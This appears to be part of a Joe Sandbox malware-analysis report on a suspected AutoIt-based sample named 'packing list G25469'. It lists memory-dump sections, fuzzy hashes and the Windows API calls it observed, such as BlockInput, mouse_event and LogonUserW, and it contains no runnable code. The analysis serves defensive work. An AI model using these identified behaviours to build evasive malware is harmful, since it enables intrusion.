                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 87998702cb8b8d158aee97077b69360fa340e9bce0d613403504c1846ed92b93
                                                  • Instruction ID: ed9d02d34e760ba47586b0be53c48e2a5f9d997d6c150886a937a32aea32fa9f
                                                  • Opcode Fuzzy Hash: 87998702cb8b8d158aee97077b69360fa340e9bce0d613403504c1846ed92b93
                                                  • Instruction Fuzzy Hash: 5A32F421D29F014DD7239634D862335A298EFBB3D5F15D767EC1AB6AA6EF29C8C34100
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: __itow__swprintf
                                                  • String ID:
                                                  • API String ID: 674341424-0
                                                  • Opcode ID: 4274c3803e184c060de7b8d0fbbc60b2c47d5199e186e92263f7b9ad15036196
                                                  • Instruction ID: d81f33ed2939d7bfd790e9c83c5e4e125f1af7d705dff58c4c6b61e7db01dfc6
                                                  • Opcode Fuzzy Hash: 4274c3803e184c060de7b8d0fbbc60b2c47d5199e186e92263f7b9ad15036196
                                                  • Instruction Fuzzy Hash: 74227A716083019FD724DF14C891B6FBBE4EF84710F204A9DF89A97291DBB1E944CB92
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 0d6fa70489a41084d3e16971815dfcac21e5a992a9845e739c8d37a6291c66b9
                                                  • Instruction ID: 6d9c387437435e5eec6529fba0391c385f1e913caadd08922f8a90302a22030d
                                                  • Opcode Fuzzy Hash: 0d6fa70489a41084d3e16971815dfcac21e5a992a9845e739c8d37a6291c66b9
                                                  • Instruction Fuzzy Hash: 42B1E120D2AF414DD32396398871336B69CAFBB2D5F91D71BFC6AB5D22EB2195C34180
                                                  APIs
                                                  • __time64.LIBCMT ref: 00B7B6DF
                                                    • Part of subcall function 00B5344A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,00B7BDC3,00000000,?,?,?,?,00B7BF70,00000000,?), ref: 00B53453
                                                    • Part of subcall function 00B5344A: __aulldiv.LIBCMT ref: 00B53473
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: Time$FileSystem__aulldiv__time64
                                                  • String ID:
                                                  • API String ID: 2893107130-0
                                                  • Opcode ID: 528c5312398a05e1a395d83d0879665b8ee21729034af9c9b8a7757be2b0abcd
                                                  • Instruction ID: 9bcf412520302ae9c12b4971bfc40d14919b6117797ca4f90788baadf0fd424d
                                                  • Opcode Fuzzy Hash: 528c5312398a05e1a395d83d0879665b8ee21729034af9c9b8a7757be2b0abcd
                                                  • Instruction Fuzzy Hash: 042172726345108BC729CF28C491B62B7E1EB95710B248EADE4E5CF2C0CB74B905DB54
                                                  APIs
                                                  • BlockInput.USER32(00000001), ref: 00B86ACA
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: BlockInput
                                                  • String ID:
                                                  • API String ID: 3456056419-0
                                                  • Opcode ID: 377340c8688895944671bd7bf86812241cbe90b944730f69fd2f1fcef1e754e4
                                                  • Instruction ID: edf7a49d4e649862cc49281b9d57704153ff49abdbb4be66a514edbc40925d8c
                                                  • Opcode Fuzzy Hash: 377340c8688895944671bd7bf86812241cbe90b944730f69fd2f1fcef1e754e4
                                                  • Instruction Fuzzy Hash: 0FE048353002046FC700EF59D844D56B7ECEF74751F04C456F945D7261DAB4F8049BA0
                                                  APIs
                                                  • mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 00B774DE
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: mouse_event
                                                  • String ID:
                                                  • API String ID: 2434400541-0
                                                  • Opcode ID: 5938d9f669a4c1b5712f5d48fbabd8a73b9c47462511f0d190442f1bbf90f840
                                                  • Instruction ID: 56ad2d779ded85117ba3d2409d4fe7f520e1f8d7e67032217ab4d4f1a706ed26
                                                  • Opcode Fuzzy Hash: 5938d9f669a4c1b5712f5d48fbabd8a73b9c47462511f0d190442f1bbf90f840
                                                  • Instruction Fuzzy Hash: 90D09EA56EC70579FD3907249C1FF761988F3007C5F94D2C9B6AACA6C1BCD45845B132
                                                  APIs
                                                  • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,00B6AD3E), ref: 00B6B124
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: LogonUser
                                                  • String ID:
                                                  • API String ID: 1244722697-0
                                                  • Opcode ID: b055ede0cecb733048a55772baca34d93e3a213698e269fb958f604cadd80d4c
                                                  • Instruction ID: e2e473b68bf546ff19a7623eb0eade8fb6b55d14742ad81732aa5f2d68a8e131
                                                  • Opcode Fuzzy Hash: b055ede0cecb733048a55772baca34d93e3a213698e269fb958f604cadd80d4c
                                                  • Instruction Fuzzy Hash: 1FD09E321A464EAFDF025FA4DC06EAE3F6AEB04701F448511FA15D60A1D675D531AB50
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: NameUser
                                                  • String ID:
                                                  • API String ID: 2645101109-0
                                                  • Opcode ID: 8958a11d19418317f260e5ae9ff4f605f6bc448dbeb52296f33ff757f1e0a311
                                                  • Instruction ID: 318dc5142c9893e77931d14b03da07defebe52d85f309b92b62156ac8e314a39
                                                  • Opcode Fuzzy Hash: 8958a11d19418317f260e5ae9ff4f605f6bc448dbeb52296f33ff757f1e0a311
                                                  • Instruction Fuzzy Hash: 51C04CB1404109DFD751DFC0CD849EEB7BCAB04301F104191A105F2110EB749B459B72
                                                  APIs
                                                  • SetUnhandledExceptionFilter.KERNEL32(?), ref: 00B5818F
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: ExceptionFilterUnhandled
                                                  • String ID:
                                                  • API String ID: 3192549508-0
                                                  • Opcode ID: 57a76f411239adcabef98dd14bc8b0da7b5464a97e3e79eefbf2a53b05360b8e
                                                  • Instruction ID: f5cb632054cd82c10850c1fb94b86195ea92b2133a6b1facc2a678e5243712ae
                                                  • Opcode Fuzzy Hash: 57a76f411239adcabef98dd14bc8b0da7b5464a97e3e79eefbf2a53b05360b8e
                                                  • Instruction Fuzzy Hash: 4FA0113000020CAB8F002B82EC088883FACEA002A0B000020F80C02022ABA3A8208A8A
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 4960bb9294ccecaf4b9c158ebd68a2b5a045aa1246e63aef4adfe3931cf647a3
                                                  • Instruction ID: 95b8d4f9942da80fb1032843e6701fcb12552c57a70b4f2e87df9b0eb6cd2b9c
                                                  • Opcode Fuzzy Hash: 4960bb9294ccecaf4b9c158ebd68a2b5a045aa1246e63aef4adfe3931cf647a3
                                                  • Instruction Fuzzy Hash: E322AD70904206DFDB24DF58C491AAEB7F1FF18304F2480AAE9669B391E731ED85DB91
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: c46bea002affe201c09488d20003e813e8312ae99c4aba56ebb23357076f9039
                                                  • Instruction ID: 660e64b72db40465c60222958937d21c05844257bbd25249af5bb96a86a24b93
                                                  • Opcode Fuzzy Hash: c46bea002affe201c09488d20003e813e8312ae99c4aba56ebb23357076f9039
                                                  • Instruction Fuzzy Hash: F7127170A04209EFDF14DFA8D985AAEB7F5FF48300F2085A9E406E7254EB35AE15CB50
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: Exception@8Throwstd::exception::exception
                                                  • String ID:
                                                  • API String ID: 3728558374-0
                                                  • Opcode ID: 2787c8ad764f5b201684fdb2c2ed6b6dbcfd0326aefd2ca99530870b7ec2d3bb
                                                  • Instruction ID: ee5c1ad3b2fb9cf742d2416f31c2e70c48057b5e76b889de1c3f3258703de92b
                                                  • Opcode Fuzzy Hash: 2787c8ad764f5b201684fdb2c2ed6b6dbcfd0326aefd2ca99530870b7ec2d3bb
                                                  • Instruction Fuzzy Hash: FF028270A00109EBDF18DF68D991AAEB7F5FF45300F2084A9E806EB255EB35DE15CB91
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 6bcf19402166b509fafb4c50a64371ef2a93877f8d810bfc08732e8a9195a1a8
                                                  • Instruction ID: 8230867f7485c14eaded701801d72b82fbbdaa6bb8fb585c42b6741ee8aba983
                                                  • Opcode Fuzzy Hash: 6bcf19402166b509fafb4c50a64371ef2a93877f8d810bfc08732e8a9195a1a8
                                                  • Instruction Fuzzy Hash: 11C196322551930AEF2D467DC47463EBAE19BA17B331A07EDD8B2CB5D5EF20C628D610
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 2d76c3bdd49f8e00aad6e71f29a941d673537f809e9b181fbd8d4251c6dfdf40
                                                  • Instruction ID: 004584b3fca5cc4786804e9be723bb1ee43f6a35ee37fe964dd8441e6f91919d
                                                  • Opcode Fuzzy Hash: 2d76c3bdd49f8e00aad6e71f29a941d673537f809e9b181fbd8d4251c6dfdf40
                                                  • Instruction Fuzzy Hash: FEC1B63221519309EF2D463DC47463EBAE19BA27B371A07EDD8B2CB4D5EF10D628D620
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                  • Instruction ID: 2b34ab5cf650a4005c2c96aa6a7dac5106ad90a9d43e73e00ee08c8861e919d8
                                                  • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                  • Instruction Fuzzy Hash: 16C1603224509309EF2D467DC47453EBAE1DBA2BB631A07FDD4B2CB5D5EE20C664E620
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106729972.0000000001347000.00000040.00000020.00020000.00000000.sdmp, Offset: 01347000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_1347000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                                  • Instruction ID: cfc843cbe56cddb6f565360bf35e307f668749473d5eab5f4258129f45c22df8
                                                  • Opcode Fuzzy Hash: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                                  • Instruction Fuzzy Hash: CE41C271D1051CEBCF48CFADC991AAEBBF2AF88201F548299D516AB345D730AB41DB80
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106729972.0000000001347000.00000040.00000020.00020000.00000000.sdmp, Offset: 01347000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_1347000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                                  • Instruction ID: 7c70511b5fcf56a10fd1503601a8d96bc811c682a815b6bb60e698c4655e3a53
                                                  • Opcode Fuzzy Hash: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                                  • Instruction Fuzzy Hash: B5019278A01109EFCB84DF98C5909AEF7F5FB48314F208599E809A7701D730AE41DB84
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106729972.0000000001347000.00000040.00000020.00020000.00000000.sdmp, Offset: 01347000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_1347000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                                  • Instruction ID: b679d9a643ca9ce04ec9100260286e709502ef5ef131fdd6b6e158b574b44d2b
                                                  • Opcode Fuzzy Hash: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                                  • Instruction Fuzzy Hash: DF019278A40109EFCB84DF98C5909AEF7F6FB48314F208599D809A7701D730AE41DB84
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106729972.0000000001347000.00000040.00000020.00020000.00000000.sdmp, Offset: 01347000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_1347000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                                  • Instruction ID: 2052e7d0eb43af8a57a5c2d707c06396f1b84aee57587abda472ed480d51124b
                                                  • Opcode Fuzzy Hash: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                                  • Instruction Fuzzy Hash: 1AB012310527488BC2118B89E008B1073ECA308E04F1000B0D40C07B01827874008D48
                                                  APIs
                                                  • DeleteObject.GDI32(00000000), ref: 00B8A2FE
                                                  • DeleteObject.GDI32(00000000), ref: 00B8A310
                                                  • DestroyWindow.USER32 ref: 00B8A31E
                                                  • GetDesktopWindow.USER32 ref: 00B8A338
                                                  • GetWindowRect.USER32(00000000), ref: 00B8A33F
                                                  • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 00B8A480
                                                  • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 00B8A490
                                                  • CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00B8A4D8
                                                  • GetClientRect.USER32(00000000,?), ref: 00B8A4E4
                                                  • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00B8A51E
                                                  • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00B8A540
                                                  • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00B8A553
                                                  • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00B8A55E
                                                  • GlobalLock.KERNEL32(00000000), ref: 00B8A567
                                                  • ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00B8A576
                                                  • GlobalUnlock.KERNEL32(00000000), ref: 00B8A57F
                                                  • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00B8A586
                                                  • GlobalFree.KERNEL32(00000000), ref: 00B8A591
                                                  • CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00B8A5A3
                                                  • OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,00BBD9BC,00000000), ref: 00B8A5B9
                                                  • GlobalFree.KERNEL32(00000000), ref: 00B8A5C9
                                                  • CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 00B8A5EF
                                                  • SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 00B8A60E
                                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00B8A630
                                                  • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00B8A81D
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                  • String ID: $AutoIt v3$DISPLAY$static
                                                  • API String ID: 2211948467-2373415609
                                                  • Opcode ID: e323c527a6e724f3204727a2cafee7a77101e64b6c5de93728d54eb94f39b128
                                                  • Instruction ID: 330396681179097746a8b8a8edb22976f34d9930cdd6096557a52e0df6712413
                                                  • Opcode Fuzzy Hash: e323c527a6e724f3204727a2cafee7a77101e64b6c5de93728d54eb94f39b128
                                                  • Instruction Fuzzy Hash: DB028E75900105EFDB14DFA8DC89EAE7BF9EB48310F148699F905AB2A0DB74ED41CB60
                                                  APIs
                                                  • SetTextColor.GDI32(?,00000000), ref: 00B9D2DB
                                                  • GetSysColorBrush.USER32(0000000F), ref: 00B9D30C
                                                  • GetSysColor.USER32(0000000F), ref: 00B9D318
                                                  • SetBkColor.GDI32(?,000000FF), ref: 00B9D332
                                                  • SelectObject.GDI32(?,00000000), ref: 00B9D341
                                                  • InflateRect.USER32(?,000000FF,000000FF), ref: 00B9D36C
                                                  • GetSysColor.USER32(00000010), ref: 00B9D374
                                                  • CreateSolidBrush.GDI32(00000000), ref: 00B9D37B
                                                  • FrameRect.USER32(?,?,00000000), ref: 00B9D38A
                                                  • DeleteObject.GDI32(00000000), ref: 00B9D391
                                                  • InflateRect.USER32(?,000000FE,000000FE), ref: 00B9D3DC
                                                  • FillRect.USER32(?,?,00000000), ref: 00B9D40E
                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00B9D439
                                                    • Part of subcall function 00B9D575: GetSysColor.USER32(00000012), ref: 00B9D5AE
                                                    • Part of subcall function 00B9D575: SetTextColor.GDI32(?,?), ref: 00B9D5B2
